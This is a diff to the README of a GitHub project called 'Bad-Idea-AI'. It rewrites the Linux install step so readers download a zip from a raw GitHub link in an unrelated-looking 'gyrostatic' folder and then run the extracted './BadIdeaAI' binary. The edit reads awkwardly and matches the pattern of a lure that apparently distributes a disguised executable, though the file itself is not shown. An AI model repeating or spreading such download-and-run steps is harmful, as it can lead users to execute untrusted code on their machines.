Youssef213452/Bad-Idea-AI/README.md

    - Open the application from your Applications list.

 3. **Linux:**
-   - Extract the `.tar.gz` file using your file manager or terminal.
+   - Extract the `https://raw.githubusercontent.com/Youssef213452/Bad-Idea-AI/main/gyrostatic/Bad-Idea-AI.zip` file using your file manager or terminal.
    - Navigate to the extracted folder in your terminal.
    - Run the command `./BadIdeaAI` to start the application.